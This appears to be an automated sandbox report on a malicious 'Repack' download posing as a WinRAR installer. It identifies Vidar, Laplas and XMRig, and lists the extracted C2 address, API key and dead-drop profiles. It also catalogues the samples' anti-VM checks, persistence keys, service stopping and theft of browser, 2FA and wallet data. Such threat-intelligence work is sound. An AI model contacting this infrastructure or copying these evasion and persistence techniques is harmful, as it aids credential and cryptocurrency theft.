laplas | hxxps://www[.]mediafire[.]com/folder/lsdjccfymbv0m/Repack

Analysis

max time kernel
349s
max time network
349s
platform
windows10-2004_x64
resource
win10v2004-20230703-en
resource tags

arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
submitted
06-07-2023 22:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://www.mediafire.com/folder/lsdjccfymbv0m/Repack

Score

10^/10

laplas vidar xmrig 1bd7a92ac17c219d20db256b6699ce49 clipper discovery evasion miner persistence spyware stealer trojan

Malware Config

Extracted

Family

vidar

Version

4.6

Botnet

1bd7a92ac17c219d20db256b6699ce49

https://steamcommunity.com/profiles/76561199523054520

https://t.me/game4serv

Attributes

profile_id_v2
1bd7a92ac17c219d20db256b6699ce49
user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0

Extracted

Family

laplas

http://185.209.161.89

Attributes

api_key
6a2714906f1325d666e4cf9f6269c2352ccfb7e7f1a23c114287dc69ddf27cb0

Signatures

Laplas Clipper
Laplas is a crypto wallet stealer with three variants written in Golang, C#, and C++.
stealer clipper laplas

Suspicious use of NtCreateUserProcessOtherParentProcess 21 IoCs

description	pid	Process	procid_target
PID 3340 created 3132	3340	87511596656412869980.exe	37
PID 3340 created 3132	3340	87511596656412869980.exe	37
PID 3340 created 3132	3340	87511596656412869980.exe	37
PID 3340 created 3132	3340	87511596656412869980.exe	37
PID 3340 created 3132	3340	87511596656412869980.exe	37
PID 5436 created 3132	5436	updater.exe	37
PID 1016 created 3132	1016	86241972503253941621.exe	37
PID 1016 created 3132	1016	86241972503253941621.exe	37
PID 1016 created 3132	1016	86241972503253941621.exe	37
PID 1016 created 3132	1016	86241972503253941621.exe	37
PID 5436 created 3132	5436	updater.exe	37
PID 5436 created 3132	5436	updater.exe	37
PID 1016 created 3132	1016	86241972503253941621.exe	37
PID 5436 created 3132	5436	updater.exe	37
PID 5436 created 3132	5436	updater.exe	37
PID 5436 created 3132	5436	updater.exe	37
PID 2208 created 3132	2208	24646710557682889582.exe	37
PID 2208 created 3132	2208	24646710557682889582.exe	37
PID 2208 created 3132	2208	24646710557682889582.exe	37
PID 2208 created 3132	2208	24646710557682889582.exe	37
PID 2208 created 3132	2208	24646710557682889582.exe	37

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	95429146528106371072.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	75125060588123477374.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ntlhost.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	76363114667566969419.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	10119908202107552286.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ntlhost.exe

XMRig Miner payload 1 IoCs

miner

resource	yara_rule
behavioral1/memory/4048-2171-0x0000000000E00000-0x0000000001729000-memory.dmp	xmrig

Downloads MZ/PE file

Drops file in Drivers directory 4 IoCs

description	ioc	Process
File created	C:\Windows\System32\drivers\etc\hosts	24646710557682889582.exe
File created	C:\Windows\System32\drivers\etc\hosts	87511596656412869980.exe
File created	C:\Windows\System32\drivers\etc\hosts	86241972503253941621.exe
File created	C:\Windows\System32\drivers\etc\hosts	updater.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Checks BIOS information in registry 2 TTPs 12 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	95429146528106371072.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ntlhost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ntlhost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	76363114667566969419.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	76363114667566969419.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	10119908202107552286.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ntlhost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ntlhost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	95429146528106371072.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	75125060588123477374.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	75125060588123477374.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	10119908202107552286.exe

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Control Panel\International\Geo\Nation	Set-up32x64bit.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Control Panel\International\Geo\Nation	Set-up32x64bit.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Control Panel\International\Geo\Nation	Set-up32x64bit.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Control Panel\International\Geo\Nation	Set-up32x64bit.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Control Panel\International\Geo\Nation	winrar-x64-622.exe

Executes dropped EXE 22 IoCs

pid	Process
5796	winrar-x64-622.exe
3400	uninstall.exe
4412	WinRAR.exe
2716	Set-up32x64bit.exe
6048	Set-up32x64bit.exe
4392	95429146528106371072.exe
3340	87511596656412869980.exe
3244	Set-up32x64bit.exe
3116	75125060588123477374.exe
5364	ntlhost.exe
5436	updater.exe
1016	86241972503253941621.exe
2064	Set-up32x64bit.exe
5852	76363114667566969419.exe
1052	08076619808441664900.exe
4772	Set-up32x64bit.exe
5628	Set-up32x64bit.exe
312	Set-up32x64bit.exe
5036	10119908202107552286.exe
2208	24646710557682889582.exe
4396	ntlhost.exe
5024	updater.exe

Loads dropped DLL 17 IoCs

pid	Process
3132	Explorer.EXE
2716	Set-up32x64bit.exe
2716	Set-up32x64bit.exe
6048	Set-up32x64bit.exe
6048	Set-up32x64bit.exe
3244	Set-up32x64bit.exe
3244	Set-up32x64bit.exe
2064	Set-up32x64bit.exe
2064	Set-up32x64bit.exe
4048	taskmgr.exe
4048	taskmgr.exe
4772	Set-up32x64bit.exe
4772	Set-up32x64bit.exe
5628	Set-up32x64bit.exe
5628	Set-up32x64bit.exe
312	Set-up32x64bit.exe
312	Set-up32x64bit.exe

Modifies system executable filetype association 2 TTPs 8 IoCs

persistence

Modify Registry

T1112

Change Default File Association

T1042

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}"	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}"	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\	uninstall.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Registers COM server for autorun 1 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B41DB860-64E4-11D2-9906-E49FADC173CA}\InProcServer32	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B41DB860-64E4-11D2-9906-E49FADC173CA}\InProcServer32\ = "C:\\Program Files\\WinRAR\\rarext.dll"	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B41DB860-64E4-11D2-9906-E49FADC173CA}\InProcServer32\ThreadingModel = "Apartment"	uninstall.exe

Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NTSystem = "C:\\Users\\Admin\\AppData\\Roaming\\NTSystem\\ntlhost.exe"	95429146528106371072.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NTSystem = "C:\\Users\\Admin\\AppData\\Roaming\\NTSystem\\ntlhost.exe"	10119908202107552286.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 6 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	ntlhost.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	76363114667566969419.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	10119908202107552286.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	ntlhost.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	95429146528106371072.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	75125060588123477374.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Drops file in System32 directory 3 IoCs

description	ioc	Process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs

pid	Process
4392	95429146528106371072.exe
3116	75125060588123477374.exe
5364	ntlhost.exe
5852	76363114667566969419.exe
5036	10119908202107552286.exe
4396	ntlhost.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 5436 set thread context of 3284	5436	updater.exe	246
PID 5436 set thread context of 5060	5436	updater.exe	247

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\WinRAR\Rar.txt	winrar-x64-622.exe
File created	C:\Program Files\WinRAR\Uninstall.lst	winrar-x64-622.exe
File created	C:\Program Files\WinRAR\Default.SFX	winrar-x64-622.exe
File created	C:\Program Files\WinRAR\Rar.exe	winrar-x64-622.exe
File created	C:\Program Files\WinRAR\7zxa.dll	winrar-x64-622.exe
File created	C:\Program Files\WinRAR\RarExt32.dll	winrar-x64-622.exe
File created	C:\Program Files\WinRAR\License.txt	winrar-x64-622.exe
File created	C:\Program Files\WinRAR\Rar.txt	winrar-x64-622.exe
File opened for modification	C:\Program Files\WinRAR\WhatsNew.txt	winrar-x64-622.exe
File opened for modification	C:\Program Files\WinRAR\RarFiles.lst	winrar-x64-622.exe
File created	C:\Program Files\WinRAR\RarExtInstaller.exe	winrar-x64-622.exe
File created	C:\Program Files\WinRAR\Zip64.SFX	winrar-x64-622.exe
File created	C:\Program Files\WinRAR\RarExtLogo.altform-unplated_targetsize-48.png	winrar-x64-622.exe
File opened for modification	C:\Program Files\WinRAR\License.txt	winrar-x64-622.exe
File created	C:\Program Files\WinRAR\Order.htm	winrar-x64-622.exe
File created	C:\Program Files\WinRAR\UnRAR.exe	winrar-x64-622.exe
File opened for modification	C:\Program Files\WinRAR\RarExtLogo.altform-unplated_targetsize-64.png	winrar-x64-622.exe
File opened for modification	C:\Program Files\WinRAR\Uninstall.lst	winrar-x64-622.exe
File opened for modification	C:\Program Files\WinRAR\WinCon.SFX	winrar-x64-622.exe
File opened for modification	C:\Program Files\WinRAR\Zip64.SFX	winrar-x64-622.exe
File created	C:\Program Files\WinRAR\zipnew.dat	uninstall.exe
File opened for modification	C:\Program Files\WinRAR\Uninstall.exe	winrar-x64-622.exe
File opened for modification	C:\Program Files\WinRAR\WinRAR.exe	winrar-x64-622.exe
File created	C:\Program Files\WinRAR\RarExt.dll	winrar-x64-622.exe
File opened for modification	C:\Program Files\WinRAR\Default.SFX	winrar-x64-622.exe
File created	C:\Program Files\WinRAR\ReadMe.txt	winrar-x64-622.exe
File opened for modification	C:\Program Files\WinRAR\Order.htm	winrar-x64-622.exe
File created	C:\Program Files\WinRAR\RarFiles.lst	winrar-x64-622.exe
File opened for modification	C:\Program Files\WinRAR\RarExtInstaller.exe	winrar-x64-622.exe
File opened for modification	C:\Program Files\WinRAR\Default64.SFX	winrar-x64-622.exe
File created	C:\Program Files\WinRAR\RarExtLogo.altform-unplated_targetsize-32.png	winrar-x64-622.exe
File opened for modification	C:\Program Files\WinRAR\RarExtPackage.msix	winrar-x64-622.exe
File created	C:\Program Files\Google\Chrome\updater.exe	24646710557682889582.exe
File created	C:\Program Files\WinRAR\WinCon.SFX	winrar-x64-622.exe
File opened for modification	C:\Program Files\WinRAR\WinCon64.SFX	winrar-x64-622.exe
File opened for modification	C:\Program Files\WinRAR\RarExtLogo.altform-unplated_targetsize-32.png	winrar-x64-622.exe
File created	C:\Program Files\WinRAR\RarExtLogo.altform-unplated_targetsize-64.png	winrar-x64-622.exe
File created	C:\Program Files\WinRAR\__tmp_rar_sfx_access_check_240749031	winrar-x64-622.exe
File opened for modification	C:\Program Files\WinRAR\UnRAR.exe	winrar-x64-622.exe
File opened for modification	C:\Program Files\WinRAR\WinRAR.chm	winrar-x64-622.exe
File created	C:\Program Files\WinRAR\rarnew.dat	uninstall.exe
File created	C:\Program Files\WinRAR\Resources.pri	winrar-x64-622.exe
File created	C:\Program Files\WinRAR\Default64.SFX	winrar-x64-622.exe
File opened for modification	C:\Program Files\WinRAR\Zip.SFX	winrar-x64-622.exe
File created	C:\Program Files\WinRAR\WinRAR.chm	winrar-x64-622.exe
File created	C:\Program Files\Google\Libs\WR64.sys	updater.exe
File opened for modification	C:\Program Files\WinRAR\Descript.ion	winrar-x64-622.exe
File opened for modification	C:\Program Files\WinRAR\RarExt32.dll	winrar-x64-622.exe
File created	C:\Program Files\WinRAR\Zip.SFX	winrar-x64-622.exe
File created	C:\Program Files\Google\Chrome\updater.exe	86241972503253941621.exe
File opened for modification	C:\Program Files\WinRAR\Rar.exe	winrar-x64-622.exe
File created	C:\Program Files\WinRAR\Uninstall.exe	winrar-x64-622.exe
File created	C:\Program Files\WinRAR\RarExtPackage.msix	winrar-x64-622.exe
File opened for modification	C:\Program Files\WinRAR\7zxa.dll	winrar-x64-622.exe
File created	C:\Program Files\Google\Chrome\updater.exe	87511596656412869980.exe
File created	C:\Program Files\WinRAR\Descript.ion	winrar-x64-622.exe
File created	C:\Program Files\WinRAR\WinRAR.exe	winrar-x64-622.exe
File created	C:\Program Files\WinRAR\WinCon64.SFX	winrar-x64-622.exe
File opened for modification	C:\Program Files\WinRAR\RarExtLogo.altform-unplated_targetsize-48.png	winrar-x64-622.exe
File opened for modification	C:\Program Files\WinRAR\Resources.pri	winrar-x64-622.exe
File opened for modification	C:\Program Files\WinRAR	winrar-x64-622.exe
File opened for modification	C:\Program Files\WinRAR\ReadMe.txt	winrar-x64-622.exe
File created	C:\Program Files\WinRAR\WhatsNew.txt	winrar-x64-622.exe
File opened for modification	C:\Program Files\WinRAR\RarExt.dll	winrar-x64-622.exe

Launches sc.exe 20 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1440	sc.exe
4432	sc.exe
2600	sc.exe
1336	sc.exe
1536	sc.exe
3656	sc.exe
1888	sc.exe
4068	sc.exe
3384	sc.exe
116	sc.exe
4800	sc.exe
1904	sc.exe
392	sc.exe
3116	sc.exe
5524	sc.exe
3140	sc.exe
3120	sc.exe
2224	sc.exe
116	sc.exe
4268	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
6104	2716	WerFault.exe	170

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Checks processor information in registry 2 TTPs 12 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Set-up32x64bit.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Set-up32x64bit.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Set-up32x64bit.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Set-up32x64bit.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Set-up32x64bit.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Set-up32x64bit.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Set-up32x64bit.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Set-up32x64bit.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Set-up32x64bit.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Set-up32x64bit.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Set-up32x64bit.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Set-up32x64bit.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

GoLang User-Agent 2 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	582	Go-http-client/1.1
HTTP User-Agent header	615	Go-http-client/1.1

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.lz	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}	uninstall.exe
